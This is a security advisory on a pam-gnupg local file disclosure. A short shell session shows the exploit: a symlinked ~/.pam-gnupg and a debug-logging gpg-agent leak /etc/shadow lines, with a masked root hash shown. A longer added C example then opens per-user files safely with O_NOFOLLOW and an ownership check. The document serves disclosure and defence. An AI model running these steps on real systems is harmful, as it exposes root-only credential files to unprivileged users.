pam-gnupg: local file disclosure

This post describes a security issue in pam-gnupg prior to version 0.1, which was addressed by commit e4f06d0a.

local file disclosure

pam-gnupg reads the user's ~/.pam-gnupg while the PAM stack is still running as root (here inside su) and hands each line to the user's gpg-agent as the keygrip argument of a PRESET_PASSPHRASE command. The path is never checked, so if ~/.pam-gnupg is a symlink to a file the user cannot read, such as /etc/shadow, lines of that file are forwarded to an agent the user controls; starting the agent with --debug-all and a log file is enough to read them back.

~$ id
uid=1000(duncan) gid=1000(duncan) groups=12(audio), 13(video), 25(input), 101(xbuilder), 995(socklog), 1000(duncan)
~$ ls -lsa /etc/shadow
8 -r--------  1 root  root  685 Jan 25 19:40 /etc/shadow
$ killall gpg-agent
$ gpg-agent --homedir /home/duncan/.gnupg --use-standard-sock --debug-all --log-file /tmp/gpg-agent
gpg-agent[17336]: reading options from '/home/duncan/.gnupg/gpg-agent.conf'
gpg-agent[17336]: enabled debug flags: mpi crypto memory cache memstat hashing ipc
~$ ls -lsa .pam-gnupg
0 lrwxrwxrwx  1 duncan  duncan  11 Feb 14 00:12 .pam-gnupg -> /etc/shadow
~$ su duncan
Password:
~$ grep root /tmp/gpg-agent
2020-02-14 00:40:15 gpg-agent[17337] DBG: chan_8 <- PRESET_PASSPHRASE root:$6$TiwuXXXXXXXXXXXXXXXXXXXXXXXXXXXX -1 44756E63616E3133333721
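The C below is an added example and is neither pam-gnupg's own code nor the change made in commit e4f06d0a. It shows one way a module running as root can open a per-user file such as ~/.pam-gnupg without being redirected to a file the user must not read: open with O_NOFOLLOW and then verify, on the opened descriptor, that it is a regular file owned by the expected uid. The function names, the temporary directory layout and the sample keygrip are constructed for the demonstration.

```c
/* Added example, not pam-gnupg code: safely opening a root-read per-user
 * file. Names and the demo keygrip are illustrative. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` only if it is a regular file owned by `owner`.
 * O_NOFOLLOW makes the kernel fail the open (ELOOP) when the final path
 * component is a symlink. The fstat check runs on the descriptor we hold,
 * not on a path that could be swapped underneath us, and it also rejects a
 * hard link to a foreign file, because the inode keeps the target's uid.
 * Returns an fd, or -1 with errno set. */
static int open_user_file(const char *path, uid_t owner)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC | O_NOCTTY);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Read up to `max` non-empty lines (keygrips) into `out`.
 * Returns the number of lines read, or -1 if the file was refused. */
int read_keygrips(const char *path, uid_t owner, char out[][128], int max)
{
    int fd = open_user_file(path, owner);
    if (fd < 0)
        return -1;
    FILE *f = fdopen(fd, "r");
    if (!f) {
        close(fd);
        return -1;
    }
    int n = 0;
    while (n < max && fgets(out[n], 128, f)) {
        out[n][strcspn(out[n], "\r\n")] = '\0';
        if (out[n][0] != '\0')
            n++;
    }
    fclose(f);
    return n;
}

/* Self-contained demo: creates a temp dir holding a regular .pam-gnupg
 * and a symlink to it, then exercises the reader. Returns 0 when the
 * regular file is read and both the symlink and a wrong-owner open are
 * refused; any other value marks which check failed. */
int demo(void)
{
    char dir[] = "/tmp/pamgnupg-demoXXXXXX";
    if (!mkdtemp(dir))
        return 1;
    char reg[256], lnk[256];
    snprintf(reg, sizeof reg, "%s/.pam-gnupg", dir);
    snprintf(lnk, sizeof lnk, "%s/.pam-gnupg-link", dir);

    FILE *f = fopen(reg, "w");
    if (!f)
        return 2;
    fputs("6F8F3A2B4C5D6E7F8091A2B3C4D5E6F708192A3B\n", f); /* constructed keygrip */
    fclose(f);
    if (symlink(reg, lnk) < 0)
        return 3;

    char lines[4][128];
    int rc = 0;
    /* Plain file owned by us: one 40-hex-char keygrip comes back. */
    if (read_keygrips(reg, getuid(), lines, 4) != 1 || strlen(lines[0]) != 40)
        rc |= 4;
    /* Symlink, even to our own file, is refused: O_NOFOLLOW judges how the
     * path resolves, not what it resolves to. */
    if (read_keygrips(lnk, getuid(), lines, 4) != -1)
        rc |= 8;
    /* Same file, but the caller expects a different owner: refused. */
    if (read_keygrips(reg, getuid() + 1, lines, 4) != -1)
        rc |= 16;

    unlink(lnk);
    unlink(reg);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = demo();
    printf("demo: %s (rc=%d)\n", rc == 0 ? "all checks passed" : "FAILED", rc);
    return rc;
}
```

Two caveats a reviewer would raise. O_NOFOLLOW only governs the last path component, so a symlinked parent directory still redirects the open; the more robust fix for a PAM module is to read the file with the user's own credentials (fork, set the user's gid and uid, then open), which this example leaves out because it has to run unprivileged. And the check does not stop the module from forwarding whatever the user wrote to gpg-agent; it only guarantees the bytes came from a file the user already owned, which is exactly what removes the disclosure.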